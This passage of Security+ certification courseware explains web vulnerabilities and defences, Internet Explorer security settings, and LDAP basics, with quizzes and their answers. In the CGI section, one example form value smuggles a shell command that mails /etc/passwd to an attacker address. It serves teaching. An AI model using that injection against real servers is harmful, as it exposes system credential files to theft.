                  Many browsers provide additional patches to fix JavaScript-related vulnerabilities.
                  These patches are typically downloadable from the vendors’ (such as Microsoft and
                  Netscape) Web sites. Unless the patch is available from the browser vendor, users
                  should disable JavaScript to avoid being victimized by such programs.
                                                                    Web security    6–17

ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides
tools for linking desktop applications to WWW content. It enables self-contained
software components to interact with a wide variety of applications. Certain components
of ActiveX can be triggered by use of HTML scripts to provide rich Web content to
clients. For instance, ActiveX technology allows users to view Word and Excel
documents directly from a browser interface. MS Office applications (Microsoft Access,
Excel, and PowerPoint) are examples of built-in ActiveX components.

Vulnerabilities
These applications utilize embedded Visual Basic code that compromises the integrity,
availability, and confidentiality of a target system. Microsoft Office specifications
support the integration of certain kinds of macros, written in Visual Basic (VB), into
MS Office documents. An attacker could potentially embed harmful macros into these
documents that could compromise a target system or information stored on that system.
After embedding malicious macros into such documents, an attacker can create an
HTML interface or link that references the infected file. The HTML is then distributed
by e-mail to the target systems. If the receiver of the infected files is an HTML-enabled
mail client, the embedded code in the referenced document is executed without the Web
client’s knowledge. Many mail clients provide an auto preview feature, so no action
might be required on the part of the victim for this action to occur. As a result of this
vulnerability, an attacker could gain access to sensitive information (passwords or other
private data stored on the system), edit the registry settings of the target system, or use
the target system to launch attacks on other systems, as in the case of a distributed
denial-of-service attack.

Safeguards
Microsoft has developed certain patches to address vulnerabilities exposed by ActiveX.
Unless specifically needed however, the best way to protect against such attacks is to
disable ActiveX scripting altogether from the client.
6–18     CompTIA Security+ Certification

Do it!              B-1:      Discussing JavaScript and ActiveX vulnerabilities
                      Questions and answers
                       1 Which of the following HTML tags indicates the beginning of JavaScript code?
                          A      <body>
                          B      <title>
                          C      <A>
                          D      <script>

                       2 Which of the following is true of JavaScript programs? (Choose all that apply.)
                          A      They can be downloaded with an HTML page.
                          B      They can perform tasks undetected by the user.
                          C      They can pass through firewalls.
                          D      They can monitor the browsing activities of a user.

                       3 ActiveX allows users to view MS Office documents directly from a browser
                         interface. True or false?

                          True

                       4 An attacker could use ActiveX to embed harmful macros into MS Office
                         documents. True or false?

                          True

                       5 The best way to protect against virus infections by ActiveX is to:
                          A      Switch on the auto preview feature in the e-mail program.
                          B      Modify the ActiveX script.
                          C      Use an antivirus scanner.
                          D      Disable ActiveX scripting.
                                                                                 Web security      6–19

              Buffer overflows
Explanation   The buffer overflow attack can be triggered by sending large amounts of data that
              exceed the capacity of the receiving application within a given field. When executed
              with precision and deliberation, such attempts might cause the application to stop
              performing its intended functions and force it to execute commands on behalf of the
              attacker.
              If the application under attack has sufficient (root) administrative privileges, it is
              possible for the attacker to take control of the entire system through the controlled
              application. There are two prerequisite objectives the attacker needs to accomplish to
              execute a successful buffer overflow attack:
                   • Place the necessary code into the program’s address space — The attacker uses
                      the victim’s buffer to place the necessary code that executes the intended attack.
                      This is accomplished by sending instructions (bytes) to the CPU of the target
                      system.
                   • Direct the application to read and execute the embedded code through effective
                      manipulation of the registers and memory of the system — Most of the time, the
                      code the attacker is looking to exploit already exists on the target system. In
                      these types of situations, all the attacker needs to do is to modify the necessary
                      parameters to point to the targeted section of the code.
              These actions are intended to corrupt the receiving buffer and alter the program’s
              control flow to trigger the desired action.
              In such attacks, the attacker can gain access to a prompt, examine system-specific
              variables, read system directories and files, and even detect network architecture, which
              he or she can use to further exploit the system. This can be especially dangerous when
              the application is configured to have root privileges on the system. In this case, the
              attacker can operate as the system administrator of the Web server and its environment.
              Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be
              precise enough to launch the attack using the instruction pointers so that he or she can
              take over the administrative privileges without crashing the system.

              Vulnerabilities
              Buffer overflow attacks often take advantage of poor application programming that does
              not check the size of the input field. Abundant information about the vulnerabilities is
              published on the Internet for the edification of vendors and hackers alike.

              Safeguards
              Careful design of the application, based on the intended response, can effectively
              prevent such attacks. While implementing buffers, software developers could set the
              program to throw away the excess data, halt all operations, or provide the user with a
              warning message if a buffer overflow condition presents itself. A more proactive
              approach would be to design the application to automatically check the size of the data
              that enters the buffer.
              System administrators should maintain current updates and patches on all software. The
              CERT Coordination Center (www.cert.org/current/) provides advisories on all
              recently discovered application vulnerabilities. They also maintain an archive of
              previously found vulnerabilities at www.cert.org/advisories.
6–20         CompTIA Security+ Certification

                           Cookies
                           Cookies serve a variety of functions, from personalizing Web pages based on user
                           preferences to keeping the state of a user’s shopping cart on an online store. Most Web-
                           based authentication models are engineered to utilize cookies for verification of a user’s
                           session. Cookies have been designed to enhance the browsing experience of a typical
                           user.
                           Cookies are stored on a user’s hard drive and can be accessed by a user’s Web browser.
                           The files contain saved login information, your address, shopping cart status, and a host
                           of other things that can make the Web browsing experience more convenient. In
                           Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and
                           Settings folder for each user of the computer (the user profile).

                           Vulnerabilities
                           Cookies contain tools that are easily exploited by hackers and some so-called legitimate
                           services to provide information about users without consent. Hackers often target
                           cookies as a means of gaining illegal access to user accounts. Cookies can also be
                           utilized to track information, such as the browsing habits of users, which might then be
                           sold to an advertisement company that targets the user with unwanted ads. It’s
                           extremely crucial for Web site owners to design security measures to handle Web-based
                           cookies in order to protect their user base and the sensitive data stored on their servers.
                           Pages that can use a server’s cookies are limited to that particular server, or to a domain
                           hosting the server. An attacker could obtain a victim’s cookie for a given service by
                           generating a script that must execute within a page from that same domain or server.
                           One can accomplish this by a process known as Error Handling Exception (EHE). An
                           attacker can execute a code on the server that generates an error message that is returned
                           to the user. The attacker can then exploit the insecure error notification to launch an
                           attack on the target server. This is possible by manipulating the error messages that are
                           returned from 404 requests (404 File Error) or from elements that are echoed back to the
                           screen unescaped.
If students are            It’s not possible for an attacker to obtain a given cookie directly from a victim’s
unfamiliar with HTML       computer. The attacker must convince a user to follow a malicious hyperlink to the
coding, explain that the
<A> tag is the anchor      targeted server so the cookie can be obtained through the error handling process on the
element used in            server. For example, the attacker could send an e-mail (containing a link to the server)
hyperlinks.                to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a
                           hyperlink and hide the malicious script behind the desired text of the <A> tag. When the
                           innocent user activates the link, the malicious script embedded in the link can trigger the
                           server to send the cookie to the attacker.
                           One of the limiting factors of this type of attack is that the user must be logged on to the
                           service during the time the attack takes place. If, for instance, the innocent user is not
                           logged on to his Hotmail account (HTML-enabled service), the attacker cannot use this
                           technique to launch the attack.
                                                                              Web security     6–21

         Safeguards
         The following policies will help protect your organization against cookie exploits:
             • Disable the use of cookies by reviewing your browser’s preferences and options.
               You can also specify that you be prompted before a site puts a cookie on your
               hard disk, so you can choose to allow or disallow the cookie.
               Notice that disabling cookies will make some Web pages inoperable.
             • Do not use cookies to store sensitive information.
             • If you must store confidential information in cookies, use SSL/TLS to prevent
               the information from being exploited by a hacker.

Do it!   B-2:     Discussing buffer overflow and cookie vulnerabilities
          Questions and answers
           1 Buffer overflow attacks perform which of the following task(s)? (Choose all that
             apply.)
              A      Monitor a browser’s activities.
              B      Send enough data to overfill the buffer of a given field within an application.
              C      Force an application to execute commands on behalf of the attacker.
              D      Embed malicious macros.

           2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
              A      The attacker must modify the necessary parameters to point to the embedded
                     code.
              B      The attacker must log in as the system administrator of the Web server.
              C      The attacker must launch the attack while the user is logged onto the service.
              D      The attack must place the necessary code to execute the attack in the victim’s
                     buffer.

           3 A hacker can exploit cookies to gain illegal access to user accounts and track the
             browsing habits of users. True or false?

              True

           4 Hackers can only gain access to a cookie if the user logs on to the targeted service
             at the same time the attack takes place. True or false?

              True
6–22      CompTIA Security+ Certification

                     Java applets
Explanation          Java applets are Internet applications (written in Java programming language) that can
                     operate on most client hardware and software platforms. Applets are typically stored on
                     Web servers, from which they can be downloaded onto clients when accessed for the
                     first time. When subsequently accessing the server, the applet is already cached on the
                     client and, therefore, can be executed with no download delay.

                     Signed and unsigned applets
                     Distribution of software over networks poses potential security problems because the
                     software must pass through many intermediate devices before it reaches the user’s
                     computer. Software, unless downloaded from a “trusted” party, poses significant risks
                     for an individual user’s computer and data. The user often has no reliable way of
                     confirming the source of downloaded software code or whether it was changed in transit
                     over the network.
                     Signing applets is a technique of adding a digital signature to an applet to prove that it
                     came unaltered from a particular trusted source. The application generates a
                     private/public key pair and obtains a certificate authenticating the signer. The
                     application then signs the applet code. Users downloading the applet can check the
                     signature to verify the source of the code.
                     Signed applets can be given more privileges than ordinary applets. An unsigned applet
                     operates subject to a set of restrictions called the sandbox model. Sandbox restrictions
                     prevent the applet from performing certain operations on local system resources (for
                     example, deleting files or modifying system information such as registry settings and
                     other control panel functions). Signed applets do not have such restrictions. Unsigned
                     applets typically display warning messages, such as the ones shown in Exhibit 6-2.




                     Exhibit 6-2: Unsigned applet warning message

                     The user of the system on which the applet will be running decides what kind of access
                     privileges should be granted to the signer of the applet. Commonly used browsers, such
                     as Netscape and Microsoft Internet Explorer keep track of these privileges. Depending
                     on the applet’s privileges, such browsers can grant access to system resources without
                     interrupting the user. If the applet is new and has not established a trust relationship
                     with the client’s system, the browser displays a security message confirming the consent
                     of the client, as shown in Exhibit 6-3.
                                                                  Web security    6–23




Exhibit 6-3: Security message confirming consent

Digitally signing an applet is a confirmation from the owner of the applet about its
legitimate purpose. The final decision about whether the applet should have access to
system resources always rest with the client. If a signed applet damages a certain system
intentionally or unintentionally, the applet can be traced back to its source from its
signature. Two reasons for using code signing features are:
    • To release the application from the sandbox restrictions imposed on unsigned
      code
    • To provide confirmation regarding the source of the applications code
The Java Development Kit ( 1.1 and later) Security Manager is aware of signatures, and,
working in conjunction with the Java key tool (which is used to sign code and specify
who is trusted), grants special privileges to signed and trusted applet code.
6–24   CompTIA Security+ Certification

                  CGI
                  The Common Gateway Interface (CGI) is a programming interface that allows Web
                  servers to perform data manipulation and interact with users. For example, CGI scripts
                  perform data input, and search and retrieval functions on databases. CGI was created to
                  extend the HTTP protocol.
                  There are typically two parts to a CGI script: an executable program on the server (the
                  script itself), and an HTML page that feeds input to the executable. The executable can
                  be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can
                  sometimes be used without user input to perform tasks such as incrementing page
                  counters and displaying the date and time.
                  The following steps and Exhibit 6-4 represent a typical form submission that takes place
                  on the Internet:
                      1 The user/client retrieves a form (an HTML-formatted page) from a server via a
                          browser.
                      2 The user fills out the form by inputting data into the required fields on his or her
                          local machine.
                      3 After filling out the form, the user submits the data to the server. This typically
                          takes place via the use of a “submit” button on the form.
                      4 The submit action performed on the client’s browser identifies the corresponding
                          program residing on the server, sends all inputted data, and ignites an execute
                          request to the server.
                      5 The server executes the requested program.




                  Exhibit 6-4: Working of a CGI script

                  A similar process takes place for all types of CGI execution. CGI is very efficient
                  because all data manipulation takes place on the server, not the client. The client merely
                  passes data to the server and receives HTML in return. This leaves the server with only
                  the task of executing the request when issued.

                  Vulnerabilities
                  The interactive nature of CGI also leads to security loopholes that need to be addressed
                  by system administrators and software developers. CGI accepts input from a page on a
                  client system (typically an HTML page downloaded in the browser), but executes the
                  request on the server. Allowing input from other systems to a program that runs on a
                  local server exposes the system to potential security hazards. Because the HTML form
                  has been transferred to the client, a malicious user can modify or add parameters to the
                  HTML form, instructing the server to do tasks outside the intended purpose of the form.
                                                                   Web security     6–25

For instance, a malicious user can modify the following instruction:
    <INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example.
    com">System Admin<br>
This instruction is supposed to generate an e-mail to a system administrator with the
following line:
    <INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example.
    com;mail malicioususer@attack.com /etc/passwd"> SystemAdmin<br
    >
This line then sends an e-mail containing the UNIX password file to the attacker.
Using such techniques, an attacker can gain access to confidential files and systems files
or install malicious programs and viruses.

Safeguards
It is extremely important to take precautions when running scripts on the Web server.
Here are some possible precautions to take:
      • Deploy intrusion detection systems (IDS), access list filtering and screening.
    • Design and code applications to check the size and content of the input received
      from the clients.
    • Create different user groups with different permissions and restrict access to the
      hierarchical file system based on those groups.
    • Validate the security of a prewritten script before deploying it in your production
      environment.
The biggest security risk of CGI scripts is not to the client where the Web browser
resides, but to the server where the script resides. CGI scripts must be carefully
scrutinized before allowing them to be placed on a Web server.
6–26     CompTIA Security+ Certification

Do it!              B-3:        Reviewing signed applet and CGI vulnerabilities
                      Questions and answers
                       1 A(n) unsigned applet operates subject to a set of restrictions called the
                         _________________________.

                          Sandbox model

                       2 New applets require the consent of the client to install. True or false?

                          True

                       3 __________________ is a programming interface that allows Web servers to
                         perform data manipulation and interact with users.

                          CGI

                       4 Which of the following can perform the CGI scripts tasks? (Choose all that
                         apply.)
                          A      Search for information
                          B      Embed malicious macros in a document
                          C      Collect client data using forms
                          D      Mail password files to an attacker

                       5 List two precautions that you should take when running CGI scripts.

                          Answers might include:
                          • Deploy intrusion detection systems (IDS), access list filtering and screening on the
                              border of the network.
                          • Design and code applications to check the size and content of the input received from the
                              clients.
                          • Create different user groups with different permissions and restrict access to the
                              hierarchical file system based on those groups.
                          • Validate the security of a prewritten script before deploying it in your production
                              environment.
                                                                                Web security     6–27

              SMTP relay
Explanation   Simple Mail Transfer Protocol (SMTP) is the standard Internet protocol for global e-
              mail communications. A mail client (user) communicates with the mail server using the
              SMTP protocol’s TCP port 25 to get e-mail from one place to another. Current versions
              of SMTP support ASCII and MIME content.
              With its high utilization across the Internet, SMTP is intentionally designed as a very
              simple protocol. This also makes it easy to understand and troubleshoot; unfortunately,
              malicious users can easily exploit this simple design in many ways across the Internet.

              SMTP spams
              Third-party SMTP relay is used to transfer messages from one server to another via
              SMTP. A malicious user could exploit this basic concept and try to hide the real origin
              of a message by using another server as an SMTP relay. In such a scenario, the attacker
              can use the relay Internet Mail Service as an agent for unsolicited commercial e-mail
              (spam), flooding innocent users’ mailboxes with many copies of the same message.
              Spam is an attempt to force messages on people who would not otherwise choose to
              receive them.
              Before you can understand how spamming is achieved via SMTP relay, it’s important to
              understand how SMTP functions. The following code demonstrates the sending of an e-
              mail message with a programming interface as opposed to using a user-friendly e-mail
              client such as Eudora. You can actually accomplish this by connecting to TCP port 25
              of the SMTP server and executing these commands.
                  HELO mail.example.com
                  250 mail.anotherexample.com Hello mail.example.com
                  [172.16.35.44], pleased to meet you
                  MAIL FROM: person1@example.com
                  250 person1@example.com… Sender ok
                  RCPT TO: person2@anotherexample.com
                  250 person2@anotherexample.com… Recipient OK
                  DATA
                  354 Enter mail, end with "." on a line by itself
                  From:
                  To:
                  250 OAA08757 Message accepted for delivery
              This transaction takes place between two SMTP servers. The sending server executes
              the bold lines; the nonbold lines are responses from the receiving server. The sending
              server introduces itself as “example.com.” The receiving server serves the
              “anotherexample.com” domain. “MAIL FROM:” and “RCPT TO:” fields indicate the
              source and the destination of the message. These fields (up until the “DATA” field)
              make up the “envelope” of the message. The “DATA” field comprises of the body of
              the message as well as the header fields. The key point is that the only variable needed
              to deliver the message is the “RCPT TO:”; a malicious user can forge other variables.
6–28   CompTIA Security+ Certification

                  It’s important to identify the real origin of a spam mail in order to take the necessary
                  action. An e-mail message typically traverses through at least two SMTP servers (the
                  sender’s and the receiver’s SMTP servers) before reaching the destination client. As
                  messages voyage to their destination, they get “stamped” by the intermediate SMTP
                  servers along the way. The stamps generate useful tracking information that can be
                  observed in the mail headers. Careful examination of these mail headers can go a long
                  way in identifying the real source of spam mail. The following text is a typical
                  “Received:” header from an e-mail message:
                      From forged-address@example.com
                      Received: from example.com ([172.16.35.44]) by mail.anotherexa
                      mple.com (8.8.5) for <receiver@anotherexample.com>…
                  Although such messages do not issue any alarms per se, careful examination of these
                  messages could unveil mismatches between the IP addresses and the domain names
                  indicated in the header. You could verify this by executing a reverse DNS lookup to
                  find out the domain name that corresponds to the indicated IP address. For instance, in
                  the Received: header above, reverse DNS lookup could reveal that the IP address
                  (172.16.35.44) does not really correspond to the “example.com” domain. In fact, most
                  modern mail programs have already incorporated this functionality, which generates a
                  Received: header that includes the identity of the attacker.
                  Spam via SMTP relay can lead to loss of bandwidth and hijacked mail servers that
                  might no longer be able to serve their legitimate purpose. Furthermore, mail servers of
                  innocent organizations can be subject to blacklisting due to problems caused by SMTP
                  relay. This might in turn prevent an organization from communicating with other
                  organizations.
                  There are institutions, such as the Open Relay Behavior-Modification System (ORBS)
                  and Mail Abuse Prevention System (MAPS), which provide reporting, cataloging, and
                  testing of e-mail servers configured for SMTP relay. These institutions maintain Real-
                  time Blackhole Lists (RBL) of mail servers with problematic histories. Being
                  blacklisted by these types of organizations can adversely affect a business’s operations.

                  Safeguards
                  Companies might configure their systems so that any mail coming from the blacklisted
                  mail servers are automatically rejected.
                                                                              Web security      6–29

Do it!   B-4:   Understanding SMTP relay vulnerabilities
          Questions and answers
          1 SMTP is an Internet e-mail service and uses TCP port 25. True or false?

            True

          2 It is possible to forge the MAIL FROM: variable within an SMTP message. True
            or False?

            True

          3 Describe some of the problems with spam via SMTP relay.

            Spam via SMTP relay can lead to a loss of bandwidth and hijacked mail servers that might no
            longer be able to serve their legitimate purpose. Furthermore, mail servers of innocent
            organizations can be subject to blacklisting due to problems caused by SMTP relay. This
            might in turn prevent an organization from communicating with other organizations. If you
            are blacklisted, your business operations can be adversely affected. Your e-mail might be
            automatically rejected by other organizations that configure their systems based on the
            blacklisted mail servers.
6–30          CompTIA Security+ Certification


Topic C: Configuring Internet Explorer security
Explanation              Most large companies have advanced firewalls and proxy services that allow them to
                         filter or block certain content addressed to employee desktops. This is a necessary
                         feature, but it’s not always practical, especially for small- to mid-sized companies, but
                         fortunately Microsoft has built-in security features available for users of Internet
                         Explorer.




                         Exhibit 6-5: Internet Options dialog box with the Security tab activated.


Do it!                   C-1:     Configuring and discussing security
                           Here’s how                                Here’s why
                            1 Switch to Internet Explorer            You’ll configure Trusted Sites in Microsoft
                                                                     Internet Explorer 6.

                            2 Choose Tools, Internet
                               Options…

                            3 Activate the Security tab              As shown in Exhibit 6-5.

                            4 Select Trusted Sites
                                                                   Web security   6–31

 5 Click Default Level                 To set the security level for the zone to Medium.
                                       If it is already set to Medium, the Default Level
                                       button will be dimmed.

 6 Click Sites

 7 Add the following Web site to the
   zone:
   www.course.com
 8 Click Close

 9 Select Restricted Sites             To configure Restricted Sites to block file
                                       downloads in Microsoft Internet Explorer 6.

10 Click Sites

   Add the following Web sites to
   the zone:
   www.kazaa.com
   ftp.microsoft.com




11 Click Close

12 Click OK                            To close the Internet Options Window.

13 In the Internet Explorer Address    Notice the Restricted sites icon in the lower
   box, enter www.kazaa.com            right corner of the browser. Kazaa completely
                                       fails to load.

14 Enter ftp.microsoft.com             In the browser's Address field.

   Navigate to /Reskit/win2000

15 Right-click ADSizer.exe

   Select Copy to Folder               A security alert appears.

                                       URLs can be redirected, so this is not the best
                                       way to block file downloads.

   Click OK                            To close the alert.

16 Close the browser
6–32     CompTIA Security+ Certification

Do it!              C-2:      Reviewing trusted sites
                      Questions and answers
                       1 Which of the following is a zone that contains all Web sites that have not been
                         placed in other zones?
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites

                       2 Which of the following is a zone that contains Web sites that could potentially
                         cause damage to your system? (Choose all that apply.)
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites

                       3 Which of the following is a zone that contains Web sites that you believe will not
                         cause damage to your system?
                          A    Internet
                          B    Local intranet
                          C    Trusted sites
                          D    Restricted sites
                                                                                 Web security     6–33

              Privacy settings
Explanation   One issue many users have with Web browsing is the fact that anyone on the Internet
              has the ability to write information to their computer’s hard drive. One example of this
              ability is the use of cookies. Cookies can be valuable to both the user and the company
              that deposits them. For example, if you go to an e-commerce site and fill out a form
              with all your important data, a cookie can be used to remember you. This is helpful
              because you’ll not have to enter the data every time you visit the site. While this
              capability can be very helpful, it can also be a major security risk. With that cookie on
              your computer, anyone with access to your computer could go to the e-commerce site
              and purchase goods without your knowledge.




              Exhibit 6-6: The Internet Explorer Privacy settings tab
6–34     CompTIA Security+ Certification




                    Exhibit 6-7: Overriding Privacy settings with Per Site Privacy Actions to allow cookies
                    to a selected site


Do it!              C-3:     Configuring and discussing privacy settings
                      Here’s how                               Here’s why
                       1 Launch Internet Explorer              You’ll configure Microsoft Internet Explorer 6
                                                               Privacy settings.

                       2 Choose Tools, Internet                The Internet Options window appears.
                          Options…

                       3 Activate the Privacy tab

                          Slide the Settings bar up to High    To block cookies that do not comply with the
                                                               W3C P3P.

                       4 Click Edit…                           To add Web sites you want to allow to bypass
                                                               the settings.

                       5 In the Address of Web Site box,
                         type www.yahoo.com

                       6 Click Allow                           Notice that only the domain is added to the
                                                               Managed Web sites list.

                          Click OK

                       7 Click OK
                                                               Web security     6–35

 8 In the Address box of your
   browser, enter www.msn.com

 9 In the Privacy message, click OK

   Double-click the cookie privacy
   warning in the toolbar
                                      A report displays, similar to the one shown
                                      below:




10 Click Close

11 In the Internet Explorer Address   Notice the privacy warning is absent.
   box, enter www.yahoo.com

12 Choose Tools, Internet
   Options…

13 Activate the Privacy tab           You’ll reset the privacy settings.

14 Click Default

   Click Apply                        To return to the medium setting.
6–36     CompTIA Security+ Certification

Do it!              C-4:      Reviewing cookies
                      Questions and answers
                       1 A cookie is a small text file that stores information that can be used by a server.
                         True or false?

                          True

                       2 Which of the following Privacy settings will block all cookies without a Compact
                         Privacy Policy?
                          A      Block all cookies
                          B      High
                          C      Medium high
                          D      Accept all cookies

                       3 Which of the following Privacy settings is likely to cause some Web pages to fail
                         to load? (Choose all that apply.)
                          A      Block all cookies
                          B      High
                          C      Medium high
                          D      Medium
                          E      Low
                          F      Accept all cookies
                                                                              Web security    6–37

              Advanced security settings
Explanation   In addition to cookies, Internet Explorer can store information about your Web
              browsing habits by caching. This can be a problem in areas that requires a high level
              security. Most users are aware of Temporary Internet Files and how to remove them.
              Temporary Internet Files are used as a local cache to increase the speed of Web
              browsing, but the files can also be used to track your path on the Web. Usernames and
              passwords can also be stored to save you time, but this might allow for unauthorized
              access to resources. These issues can be resolved by using Internet Explorer’s Advanced
              Security Settings.




              Exhibit 6-8: Advanced Internet security options
6–38     CompTIA Security+ Certification

Do it!              C-5:     Configuring and discussing advanced security
                             settings
                      Here’s how                            Here’s why
                       1 Activate the Advanced tab

                          Scroll down to the Security       (As shown in Exhibit 6-8.)
                          section and review the settings

                       2 Activate the Content tab

                       3 Click AutoComplete…

                          Clear Usernames and
                          passwords on forms




                       4 Click OK                           To close the AutoComplete Settings window.

                       5 Click OK                           To close the Internet Options window.

                       6 Close all open windows
                                                                         Web security    6–39

Do it!   C-6:   Reviewing advanced security settings
          Questions and answers
          1 If you wish to prevent secure files from being stored in Temporary Internet Files
            you can check which of the following Security options?
            A    Do not save encrypted file to disk
            B    Empty Temporary Internet Files folder when browser is closed
            C    Use Fortezza
            D    Do not save Certificates to disk

          2 When you enable the option Empty Temporary Internet Files folder when
            your browser is closed, it also deletes all cookies. True or false?

            False: It does not affect the cookies.
6–40      CompTIA Security+ Certification


Unit summary: Web security
Topic A              In this topic, you learned the fundamentals of SSL/TLS and HTTPS protocols and their
                     implementation on the Internet. You learned that the Secure Sockets Layer (SSL) and
                     Transport Layer Security (TLS) are commonly used protocols for managing the security
                     of a message transmitted across the “insecure” Internet.
Topic B              In this topic, you learned the basics of how JavaScript, buffer overflow, ActiveX,
                     cookies, CGI, applets, and SMTP relay work, and how they are commonly exploited
                     by hackers.
Topic C              In this topic, you learned how to configure Microsoft Internet Explorer to block cookies
                     and file downloads and set privacy setting. You also learned how to configure
                     advanced security settings.

                     Review questions
                     1   Signing applets is a technique of adding a _________ __________ to an applet to
                         prove that it came unaltered from a particular trusted source.
                         digital signature

                     2   Sandbox restrictions might prevent the applet from performing required operations
                         on local system resources. True or false?
                         True

                     3   In order to use SSL security in a Web page transaction, what must be used in the
                         Web page URL?
                         HTTPS

                     4   A time stamp is a typical component found on a typical certificate. True or false?
                         True

                     5   __________________ is an interface specification that allows communications between
                         client programs and Web servers.
                         CGI
                                                                     7–1


Unit 7
Directory and file transfer services
                           Unit time: 90 minutes

                           Complete this unit, and you’ll know how to:

                           A Describe LDAP directory services.

                           B Identify the major vulnerabilities of the
                              FTP method of exchanging data and
                              identify countermeasures.

                           C Describe the threat posed to your network
                              by unmonitored file sharing.
7–2       CompTIA Security+ Certification


Topic A: Introduction to directory services
                     This topic covers the following CompTIA Security+ exam objective:

                      #        Objective

                      2.4      Recognize and understand the administration of the following directory security concepts
                                • LDAP (Lightweight Directory Access Protocol)




                     Directory services
Explanation          A directory service provides a database for inventory and administration of every object
                     on the network. The directory service performs the following functions:
                            • Records and organizes information about every user account, server, printer,
                              workstation, and file system on the network.
                            • Grants users access to applications, files, printers, and other network services
                              anywhere on the network with a single login sequence.
                            • Enables the LAN Administrator to track the location and disposition of all
                              network resources.
                     Information gathered for each network resource is stored as an object in the database.
                     Users can query the database using a broad set of criteria (such as name, type of service,
                     or location).

                     LDAP
                     Lightweight Directory Access Protocol (LDAP) is a commonly used directory service
                     protocol created by the Internet Engineering Task Force (IETF). It was originally
                     designed to work as a front-end client for X.500 directory services (an ISO and ITU
                     standard that defines how global directories should be structured). X.500 requires the
                     full OSI protocol stack and significant computer resources to operate. In response,
                     LDAP was redesigned as a stripped-down version of X.500.
                     LDAP offers the following features:
                            • Hierarchical database structure follows X.500 standards
                            • Extensible for use with any X.500-compatible database
                            • Provides authentication and authorization services
                            • Easily deploys on any client or server
                            • Runs over TCP/IP networks
                            • Supports most operating systems (platform-independent)
                     LDAP’s key advantage is that it’s a versatile directory system that is standards-based
                     and platform-independent. This has caused LDAP to proliferate to nearly all operating
                     systems and has caused the protocol to be widely adopted for a variety of networking
                     applications (see the following table for a sample of major players in the LDAP
                     market). This protocol runs on TCP/IP, so it can be deployed on most networks.
                                                   Directory and file transfer services   7–3

 Vendor            Product

 Microsoft         Active Directory

 Sun               ONE Integration Server (formerly Netscape iPlanet)

 IBM               Directory Server

 Novell            eDirectory

 MessagingDirect   M-Vault

 Opensource        OpenLDAP




Authentication and authorization
As more and more applications have been deployed on the network to support critical
business functions, there has been an increasing need to authenticate users to secure
those applications. Today’s networks typically have a host of operating systems and a
matching number of different applications. LDAP synchronizes usernames and
passwords across operating platforms and applications, enabling access to network
resources with a single login sequence.
A few common applications of LDAP include:
    • Single sign-on (SSO) — SSO is an authentication process in a client/server
      environment where a user can enter a single username and password and obtain
      access to more than one application or network resource.
    • User administration — A major problem for enterprises is the costly task (in
      terms of system administrator time) of maintaining user accounts. Maintenance
      activities include the creation and deletion of accounts, as well as adding and
      removing user privileges (such as when a user moves to another department).
      LDAP’s flexibility simplifies this process because administrators have only one
      user database to manage, and it handles authentication and authorization for all
      major applications.
    • Public key infrastructure (PKI) — PKI is a system for creating and managing
      certificates used for authentication and encryption. A basic requirement for PKI
      is the maintenance of user certificates, which is often accomplished using
      LDAP. A user certificate contains a user’s public key together with additional
      identifying data. This certificate is created and authenticated by a certificate
      authority (CA) that guarantees the certificate is valid (the user’s identity has
      been validated), provided it has not been revoked. Most CAs support the
      delivery of certificates to LDAP-based directory systems.
7–4   CompTIA Security+ Certification

                 LDAP framework
                 An LDAP directory follows the X.500 hierarchical tree format as shown in Exhibit 7-1.
                 The diagram portrays an inverted tree, with its root at the top and branches extending
                 out from the root. The branches are classified as containers since their sole purpose is to
                 hold or contain other objects. The most elemental units are called leaf objects. Each leaf
                 on the tree describes a single network resource, such as a computer, printer, user, or file
                 system directory.




                 Exhibit 7-1: Directory information tree
                                                    Directory and file transfer services       7–5

The following table describes each level of the tree structure:

 Level                           Description

 [Root]                          At the top of this inverted tree is the [Root]. Like the root of the
                                 file directory tree, this is the highest level you can go within the
                                 LDAP structure. The [Root] is created during installation of the
                                 first LDAP server on the network and cannot be moved, deleted,
                                 or renamed. The Directory tree can have only one [Root].

 Country                         The Country object, an optional object representing the country
                                 of the network, is positioned directly beneath the [Root] object.

 Organization                    The next level contains an object called the Organization. The
                                 Organization is classified as a “container,” since its sole purpose
                                 is to hold or contain other objects. Organizations typically
                                 represent a company or department and are used to store other
                                 objects. Every tree must have at least one Organization.

 Organizational Unit             Beneath the Organization is another container called the
                                 Organizational Unit. Organizational Units typically represent a
                                 division, department, workgroup, or project team, and can
                                 contain other Organizational Units or leaf objects.
                                 Organizational Units are optional in the LDAP hierarchy.

 Leaf Objects                    Leaf objects are the most elemental unit in the LDAP tree. Each
                                 leaf on the tree describes a single network resource. The
                                 Directory tree represents each leaf object with an icon that
                                 shows what type of resource it is and how it is named.


Each entry in the directory has a distinguished name (DN) and its own attributes
followed by specific values. Each distinguished name must be unique throughout the
LDAP directory because it identifies a single network object.
An example of the DN of an entry (an individual) stored in a LDAP directory is:
     cn=Jonathan Q Public, ou=Information Security Department,
     o=XYZ Corp, c=United States
Using the following table you can decode the fields in the DN. Jonathan Q Public is the
common name of the individual who works in the Information Security Department of
XYZ Corp., which is headquartered in the United States.

 Abbreviation          Description

 DN                    Distinguished name

 CN                    Common name

 OU                    Organizational unit

 O                     Organization

 C                     Country
7–6   CompTIA Security+ Certification

                 LDAP security benefits
                 Some key benefits of LDAP is that it provides authentication of users to ensure their
                 identities, authorization services to determine which network resources the user might
                 access, and finally, encryption for secure communications. LDAP offers encryption by
                 utilizing other protocols through a standards-based interface called Simple
                 Authentication and Security Layer (SASL).

                 Authentication
                 To access the LDAP directory service, the LDAP client must authenticate itself to the
                 LDAP. LDAP then uses the bind operation to provide authentication services when the
                 client attempts to establish a connection with a server.
                 Three levels of authentication are provided by LDAP:
                     • No authentication — This mode is used if the directory is publicly published
                       information and there is no need to restrict access. An example of such a
                       directory might be the business white pages that list the telephone numbers of all
                       businesses in the Phoenix metropolitan area.
                     • Simple authentication — Simple mode passes the authentication information
                       across the network in clear text. This clear security risk can be mitigated if
                       encryption is provided by a lower-level protocol such as IPSec.
